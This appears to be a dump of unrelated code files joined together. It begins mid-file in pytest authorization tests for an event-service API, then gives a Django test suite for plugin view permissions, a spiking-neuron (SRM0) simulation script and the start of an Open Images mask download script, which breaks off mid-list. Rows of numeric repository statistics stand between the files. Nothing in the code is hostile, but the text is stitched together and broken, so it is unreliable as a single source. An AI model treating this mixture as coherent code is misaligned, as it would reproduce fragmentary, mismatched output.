EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=None,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format", # noqa: B950
return_value=None,
)
request_body = new_event_format_interval_start
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 400
# Unauthorized cases:
@pytest.mark.integration
async def test_create_event_format_no_authorization(
client: _TestClient,
mocker: MockFixture,
event: dict,
new_event_format_interval_start: dict,
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.events_adapter.EventsAdapter.get_event_by_id", # noqa: B950
return_value=event,
)
mocker.patch(
"event_service.services.event_format_service.create_id",
return_value=RACECLASS_ID,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.create_event_format",
return_value=RACECLASS_ID,
)
request_body = new_event_format_interval_start
headers = MultiDict([(hdrs.CONTENT_TYPE, "application/json")])
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.post(
f"/events/{EVENT_ID}/format", headers=headers, json=request_body
)
assert resp.status == 401
@pytest.mark.integration
async def test_get_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.get(f"/events/{EVENT_ID}/format")
assert resp.status == 401
@pytest.mark.integration
async def test_put_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorizedt."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=RACECLASS_ID,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
}
request_body = event_format_interval_start
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 401
@pytest.mark.integration
async def test_list_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=[event_format_interval_start],
)
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.get(f"/events/{EVENT_ID}/format")
assert resp.status == 401
@pytest.mark.integration
async def test_delete_event_format_no_authorization(
client: _TestClient, mocker: MockFixture, event_format_interval_start: dict
) -> None:
"""Should return 401 Unauthorized."""
EVENT_ID = "event_id_1"
RACECLASS_ID = "290e70d5-0933-4af0-bb53-1d705ba7eb95"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=event_format_interval_start,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.delete_event_format",
return_value=RACECLASS_ID,
)
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=401)
resp = await client.delete(f"/events/{EVENT_ID}/format")
assert resp.status == 401
# NOT FOUND CASES:
@pytest.mark.integration
async def test_get_event_format_not_found(
client: _TestClient, mocker: MockFixture, token: MockFixture
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=None,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.get(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 404
@pytest.mark.integration
async def test_update_event_format_not_found(
client: _TestClient,
mocker: MockFixture,
token: MockFixture,
event_format_interval_start: dict,
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=None,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.update_event_format",
return_value=None,
)
headers = {
hdrs.CONTENT_TYPE: "application/json",
hdrs.AUTHORIZATION: f"Bearer {token}",
}
request_body = event_format_interval_start
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.put(
f"/events/{EVENT_ID}/format",
headers=headers,
json=request_body,
)
assert resp.status == 404
@pytest.mark.integration
async def test_delete_event_format_not_found(
client: _TestClient, mocker: MockFixture, token: MockFixture
) -> None:
"""Should return 404 Not found."""
EVENT_ID = "event_id_1"
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.get_event_format",
return_value=None,
)
mocker.patch(
"event_service.adapters.event_format_adapter.EventFormatAdapter.delete_event_format",
return_value=None,
)
headers = {
hdrs.AUTHORIZATION: f"Bearer {token}",
}
with aioresponses(passthrough=["http://127.0.0.1"]) as m:
m.post("http://example.com:8081/authorize", status=204)
resp = await client.delete(f"/events/{EVENT_ID}/format", headers=headers)
assert resp.status == 404
| 33.384181
| 107
| 0.676426
| 2,798
| 23,636
| 5.435668
| 0.065404
| 0.096916
| 0.041028
| 0.058978
| 0.928989
| 0.92419
| 0.912092
| 0.900191
| 0.888487
| 0.853113
| 0
| 0.038416
| 0.208157
| 23,636
| 707
| 108
| 33.4314
| 0.774204
| 0.013581
| 0
| 0.748727
| 0
| 0
| 0.310641
| 0.190881
| 0
| 0
| 0
| 0
| 0.061121
| 1
| 0.001698
| false
| 0.032258
| 0.016978
| 0
| 0.028862
| 0.042445
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc61fc008f5a2ff0110efe4d746b412fd0f68f32
| 14,208
|
py
|
Python
|
library/plugins/tests/test_views.py
|
lizgehret/library
|
e9343bb0a4a709064b6a817b99f3b410cc7a3978
|
[
"BSD-3-Clause"
] | 2
|
2018-08-17T03:50:41.000Z
|
2018-11-19T03:49:39.000Z
|
library/plugins/tests/test_views.py
|
lizgehret/library
|
e9343bb0a4a709064b6a817b99f3b410cc7a3978
|
[
"BSD-3-Clause"
] | 15
|
2018-08-22T16:39:09.000Z
|
2021-09-28T18:28:05.000Z
|
library/plugins/tests/test_views.py
|
lizgehret/library
|
e9343bb0a4a709064b6a817b99f3b410cc7a3978
|
[
"BSD-3-Clause"
] | 10
|
2018-08-16T22:33:56.000Z
|
2022-01-05T18:18:01.000Z
|
# ----------------------------------------------------------------------------
# Copyright (c) 2018-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from django import test
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from library.plugins.models import LegacyPlugin, LegacyPluginAuthorship
User = get_user_model()
_BASE_USER = {
'email': '',
'password': '',
'full_name': '',
'forum_external_id': '',
'forum_avatar_url': 'https://qiime2.org',
'forum_is_admin': False,
'forum_is_moderator': False,
}
_BASE_PLUGIN = {
'title': 'plugin',
'short_summary': 'lorem ipsum summary',
'description': 'lorem ipsum description',
'install_guide': 'lorem ipsum install',
'published': True,
'source_url': 'https://qiime2.org',
'version': '0.1.4',
}
class AnonymousUserAuthorizationTests(test.TestCase):
def setUp(self):
self.client = test.Client()
def test_legacy_plugin_list_no_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_list_some_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_detail_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/login/?next=/plugins/new/')
def test_legacy_plugin_edit_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_published(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
class LoggedInUserAuthorizationTests(test.TestCase):
@classmethod
def setUpTestData(cls):
cls.user = User.objects.create_user(
'user',
**{**_BASE_USER, 'forum_external_id': '1', 'password': 'peanut'})
def setUp(self):
self.client = test.Client()
self.client.login(username='user', password='peanut')
def test_legacy_plugin_list_no_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_list_some_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_detail_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 403)
def test_legacy_plugin_edit_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_published(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
class AuthorAuthorizationTests(test.TestCase):
@classmethod
def setUpTestData(cls):
cls.user = User.objects.create_user(
'author',
**{**_BASE_USER, 'forum_external_id': '1', 'password': 'peanut'})
cls.user.groups.add(Group.objects.get(name='forum_trust_level_1'))
def setUp(self):
self.client = test.Client()
self.client.login(username='author', password='peanut')
def test_legacy_plugin_list_one_unpublished(self):
unpublished = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=unpublished, author=self.user, list_position=0)
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 1)
def test_legacy_plugin_list_one_published(self):
p = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPluginAuthorship.objects.create(plugin=p, author=self.user, list_position=0)
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 1)
def test_legacy_plugin_list_published_and_unpublished(self):
p1 = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPluginAuthorship.objects.create(plugin=p1, author=self.user, list_position=0)
p2 = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=p2, author=self.user, list_position=0)
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_detail_unpublished_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_detail_published_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_detail_published_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 200)
def test_legacy_plugin_edit_unpublished_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_unpublished_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_edit_published_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_published_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'unpublished_plugin'})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
class AdminAuthorizationTests(test.TestCase):
@classmethod
def setUpTestData(cls):
cls.user = User.objects.create_user(
'admin',
**{**_BASE_USER, 'forum_external_id': '1', 'password': 'peanut',
'is_superuser': True, 'forum_is_admin': True})
def setUp(self):
self.client = test.Client()
self.client.login(username='admin', password='peanut')
def test_legacy_plugin_list_no_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_list_some_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_detail_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'unpublished_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 200)
def test_legacy_plugin_edit_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_edit_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'unpublished_plugin'})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
| 39.687151
| 100
| 0.668778
| 1,577
| 14,208
| 5.797083
| 0.07863
| 0.088602
| 0.113214
| 0.116386
| 0.894006
| 0.894006
| 0.890396
| 0.882848
| 0.870378
| 0.870378
| 0
| 0.012659
| 0.177154
| 14,208
| 357
| 101
| 39.798319
| 0.76931
| 0.023508
| 0
| 0.752101
| 0
| 0
| 0.148637
| 0.001875
| 0
| 0
| 0
| 0
| 0.226891
| 1
| 0.168067
| false
| 0.029412
| 0.016807
| 0
| 0.201681
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8994a553561499009f2944222a2904e3e2b47f
| 6,210
|
py
|
Python
|
examples/Example - SRM0 Neurons.py
|
bblais/Plasticnet
|
e450e56a9b993e361873b6a235fdcc55a5690abb
|
[
"MIT"
] | null | null | null |
examples/Example - SRM0 Neurons.py
|
bblais/Plasticnet
|
e450e56a9b993e361873b6a235fdcc55a5690abb
|
[
"MIT"
] | null | null | null |
examples/Example - SRM0 Neurons.py
|
bblais/Plasticnet
|
e450e56a9b993e361873b6a235fdcc55a5690abb
|
[
"MIT"
] | 1
|
2020-01-16T18:20:53.000Z
|
2020-01-16T18:20:53.000Z
|
# coding: utf-8
# In[1]:
from splikes import *
# In[13]:
from pylab import figure,legend,plot,linspace
# <img src="./images/epsp1.png">
# Input Rate: $\rho$
#
# Equation for Unsmoothed:
#
# \begin{eqnarray}
# u&\rightarrow& u+a\cdot w_i \mbox{ (input spike on input $i$)}\\
# \frac{du}{dt}&=& -u/\tau
# \end{eqnarray}
#
# Average value:
# \begin{eqnarray}
# <u> = a\cdot w\cdot \tau\cdot \rho
# \end{eqnarray}
#
# Equation for Smoothed:
#
# \begin{eqnarray}
# v&\rightarrow& v+a\cdot w_i \mbox{ (input spike on input $i$)}\\
# \frac{dv}{dt}&=& -v/\tau\\
# \frac{du}{dt}&=& (v-u)/\tau
# \end{eqnarray}
#
# Average value:
# \begin{eqnarray}
# <u> = a\cdot w\cdot \tau\cdot \rho
# \end{eqnarray}
#
# In[4]:
pre=neurons.poisson_pattern([10])
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.01
post2=neurons.srm0(1)
post2.smoothed=False
post2.tau=0.01
post2.name='unsmoothed'
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(.3,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,3))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
# In[6]:
pre=neurons.poisson_pattern([20])
pre.save_spikes_begin=0.0
pre.save_spikes_end=10
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.01
c=connection(pre,post,[1,1])
sim=simulation(2,dt=0.0001)
sim.monitor(post,['u',],0.001)
run_sim(sim,[pre,post],[c])
figure(figsize=(15,5))
m=sim.monitors['u']
m.plot()
for t,n in pre.saved_spikes:
plot([t,t],[0,0.1],'g',linewidth=3)
# In[7]:
pre.saved_spikes
# In[8]:
pre=neurons.poisson_pattern([10])
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.1
post.a=10
post2=neurons.srm0(1)
post2.smoothed=False
post2.tau=0.1
post2.a=10
post2.name='unsmoothed'
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,5))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
plot([0,11],[10,10],'r--',linewidth=3)
paramtext(0.15,0.7,
r'%d Hz' % (10),
r'$a=%.f$' % (post2.a),
r'$\tau=%.1f$' % (post2.tau),
)
# ### try with isi invgauss input
# In[9]:
ISI=neurons.isi_distributions.invgauss(0,1.0)
pre=neurons.isi_pattern([10],ISI)
pre.time_between_patterns=1*second
pre.save_spikes_begin=0
pre.save_spikes_end=10
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.1
post.a=10
post.save_spikes_begin=0
post.save_spikes_end=10
post2=neurons.srm0(1)
post2.smoothed=False
post2.tau=0.1
post2.a=10
post2.name='unsmoothed'
post2.save_spikes_begin=0
post2.save_spikes_end=10
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,5))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
plot([0,11],[10,10],'r--',linewidth=3)
paramtext(0.15,0.7,
r'%d Hz' % (10),
r'$a=%.f$' % (post2.a),
r'$\tau=%.1f$' % (post2.tau),
)
figure()
pre.plot_spikes()
figure()
post.plot_spikes()
post2.plot_spikes(1)
# In[10]:
ISI=neurons.isi_distributions.invgauss(0,1.0)
pre=neurons.isi_pattern([10],ISI)
pre.time_between_patterns=1*second
pre.save_spikes_begin=0
pre.save_spikes_end=10
ISI2a=neurons.isi_distributions.invgauss(0,1.0)
ISI2b=neurons.isi_distributions.invgauss(0,1.0)
post=neurons.srm0_isi(1,ISI2a)
post.smoothed=True
post.tau=0.1
post.a=10
post.save_spikes_begin=0
post.save_spikes_end=10
post2=neurons.srm0_isi(1,ISI2b)
post2.smoothed=False
post2.tau=0.1
post2.a=10
post2.name='unsmoothed'
post2.save_spikes_begin=0
post2.save_spikes_end=10
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,5))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
plot([0,11],[10,10],'r--',linewidth=3)
paramtext(0.15,0.7,
r'%d Hz' % (10),
r'$a=%.f$' % (post2.a),
r'$\tau=%.1f$' % (post2.tau),
)
figure()
pre.plot_spikes()
figure()
post.plot_spikes()
post2.plot_spikes(1)
# In[11]:
c.weights
# <img src="images/input_rate1.png">
# In[15]:
from pylab import mean
# In[16]:
rate_arr=linspace(1,50,100)
#print rate_arr
mean_arr=[]
for rate in rate_arr:
pre=neurons.poisson_pattern([rate])
post=neurons.srm0(1)
post.tau=0.1
post.a=10.0
c=connection(pre,post,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
run_sim(sim,[pre,post],[c],print_time=False)
u=sim.monitors['u'].array()
mean_arr.append(mean(u))
plot(rate_arr,mean_arr,'o')
xlabel(r'Input Rate ($\rho$)')
ylabel('Mean $u$')
plot(rate_arr,rate_arr*post.a*post.tau,'r--')
paramtext(.2,.7,
r'$a=%s$' % post.a,
r'$\tau=%s$' % post.tau,
r'$w=%s$' % float(c.weights),
)
paramtext(.5,.9,
r'$\langle u \rangle = w\cdot \rho \cdot a \cdot \tau$')
# <img src="images/weight_dependence1.png">
# In[17]:
w_arr=linspace(0.01,2,100)
#print w_arr
mean_arr=[]
rate=10
for w in w_arr:
pre=neurons.poisson_pattern([rate])
post=neurons.srm0(1)
post.tau=0.1
post.a=10.0
c=connection(pre,post,[w,w])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
run_sim(sim,[pre,post],[c],print_time=False)
u=sim.monitors['u'].array()
mean_arr.append(mean(u))
plot(w_arr,mean_arr,'o')
xlabel('Connection Strength')
ylabel('Mean $u$')
plot(w_arr,w_arr*rate*post.a*post.tau,'r--')
paramtext(.2,.7,
r'$a=%s$' % post.a,
r'$\tau=%s$' % post.tau,
r'$\rho=%s$' % rate,
)
paramtext(.5,.9,
r'$\langle u \rangle = w\cdot \rho \cdot a \cdot \tau$')
# In[ ]:
| 17.44382
| 66
| 0.633333
| 1,072
| 6,210
| 3.590485
| 0.117537
| 0.025461
| 0.014289
| 0.030398
| 0.822292
| 0.799688
| 0.799688
| 0.777085
| 0.768511
| 0.768511
| 0
| 0.073662
| 0.14525
| 6,210
| 355
| 67
| 17.492958
| 0.651469
| 0.126248
| 0
| 0.810945
| 0
| 0
| 0.088624
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.014925
| 0.00995
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5db4b6cbe3f3d4a96436aeb98805fe9395f0b855
| 5,289
|
py
|
Python
|
pipeline/scripts/download_segs.py
|
deplatformr/open-images
|
3726c9802bda1d7ecbbbd9920d5566daaecc9faa
|
[
"MIT"
] | 2
|
2020-10-12T02:37:54.000Z
|
2020-10-14T15:16:49.000Z
|
pipeline/scripts/download_segs.py
|
deplatformr/open-images
|
3726c9802bda1d7ecbbbd9920d5566daaecc9faa
|
[
"MIT"
] | null | null | null |
pipeline/scripts/download_segs.py
|
deplatformr/open-images
|
3726c9802bda1d7ecbbbd9920d5566daaecc9faa
|
[
"MIT"
] | null | null | null |
import requests
import os
import shutil
from zipfile import ZipFile
download_dir = os.path.join(os.getcwd(), "source_data/segmentations")
urls = ("https://storage.googleapis.com/openimages/v5/train-masks/train-masks-0.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-1.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-2.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-3.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-4.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-5.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-6.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-7.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-8.zip",
